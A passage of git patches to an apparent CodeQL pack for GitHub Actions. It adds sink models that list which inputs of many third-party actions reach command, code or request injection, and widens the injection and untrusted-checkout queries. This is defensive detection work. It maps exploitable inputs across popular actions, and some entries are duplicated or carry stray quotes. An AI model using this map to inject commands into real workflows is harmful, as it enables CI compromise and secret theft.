a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml new file mode 100644 index 000000000000..90fd673c705b --- /dev/null +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f587063..2c9f46b46f45 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 000000000000..1bcf8e7ce7ab --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 000000000000..817067445681 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 000000000000..aeca6db0d98d --- /dev/null +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..b9358bd2d69a --- /dev/null +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml new file mode 100644 index 000000000000..a18319954e3b --- /dev/null +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 3db3e9cf66c0..f46c40a8f9cb 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml new file mode 100644 index 000000000000..219de80c39e2 --- /dev/null +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml new file mode 100644 index 000000000000..dc3c2739e87f --- /dev/null +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml new file mode 100644 index 000000000000..30679750f131 --- /dev/null +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] + - ["nick-fields/retry", "*", "input.command", "command-injection"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml new file mode 100644 index 000000000000..c600e7a93b64 --- /dev/null +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/graphql-action", "*", "input.query", "request-forgery"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml new file mode 100644 index 000000000000..ed9088c9f568 --- /dev/null +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octokit/request-action", "*", "input.route", "request-forgery"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml new file mode 100644 index 000000000000..988c3d5e674f --- /dev/null +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml new file mode 100644 index 000000000000..91a3382348ca --- /dev/null +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml new file mode 100644 index 000000000000..d9d15dc94b27 --- /dev/null +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml new file mode 100644 index 000000000000..6bc0467692d2 --- /dev/null +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml new file mode 100644 index 000000000000..62dea47d8184 --- /dev/null +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml new file mode 100644 index 000000000000..525d0199859d --- /dev/null +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection"] + - ["py-actions/flake8", "*", "input.path", "command-injection"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] + - ["py-actions/flake8", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml new file mode 100644 index 000000000000..5aac0f894327 --- /dev/null +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml new file mode 100644 index 000000000000..d32c6509ad7e --- /dev/null +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 000000000000..c4ea326ecef0 --- /dev/null +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -0,0 +1,24 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml new file mode 100644 index 000000000000..7213a39f992b --- /dev/null +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml new file mode 100644 index 000000000000..3207c6d75211 --- /dev/null +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml new file mode 100644 index 000000000000..d00d78bcba8a --- /dev/null +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml new file mode 100644 index 000000000000..e2813105bdc9 --- /dev/null +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 0190ffd9ad72..d6ba27a50798 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 87610c434403..413f4f3058bc 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 000000000000..42361b203e08 --- /dev/null +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml new file mode 100644 index 000000000000..474b36186b09 --- /dev/null +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml new file mode 100644 index 000000000000..73b93dbb88af --- /dev/null +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml new file mode 100644 index 000000000000..4138b97f0fb2 --- /dev/null +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml new file mode 100644 index 000000000000..1bcbac476a80 --- /dev/null +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection"] + - ["tibdex/backport", "*", "input.head_template", "code-injection"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection"] + - ["tibdex/backport", "*", "input.title_template", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 21a0b479ef55..7c681d8a64b3 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -19,4 +19,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml new file mode 100644 index 000000000000..3072c6f54fd3 --- /dev/null +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml new file mode 100644 index 000000000000..5fe53ea3d079 --- /dev/null +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml new file mode 100644 index 000000000000..5e87f6c3b941 --- /dev/null +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] + - ["veracode/veracode-sca", "*", "input.path", "command-injection"] + - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"] + - ["veracode/veracode-sca", "*", "input.url", "command-injection"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml new file mode 100644 index 000000000000..dbe5d2d542dd --- /dev/null +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"] + - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"] + - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml new file mode 100644 index 000000000000..9ecbdb6329f5 --- /dev/null +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"] + - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml new file mode 100644 index 000000000000..10920eb6bf59 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 000000000000..a1d49af08456 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad26..33d6260203ef 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From fe1bf58ae537271980678fc34b9237e5a27fc4a9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:05 +0100 Subject: [PATCH 097/707] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index c9ad93d18b20..9ea69477675a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -37,6 +37,7 @@ predicate containsHeadRef(string s) { Utils::normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment. "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. @@ -82,7 +83,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From aa37339deb22e8ac1d24e7305659342be3bac1a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:22:40 +0100 Subject: [PATCH 098/707] Apply suggestions from code review --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 143e89512fe5..19d1924731ab 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -5,7 +5,6 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index b05dd852dbfe..9a97a1c45b43 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -47,7 +47,7 @@ private newtype TAstNode = ) ) or - // if's conditions do not need to be delimted with ${{}} + // `if`'s conditions do not need to be delimted with ${{}} exists(YamlMapping m | m.maps(key, value) and key.(YamlScalar).getValue() = ["if"] and From e726f9fff12fb35b5f0b1287aa87e0e1e5fb7136 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 09:24:32 +0100 Subject: [PATCH 099/707] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 9ea69477675a..4a0a4b6ade6c 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -48,6 +48,26 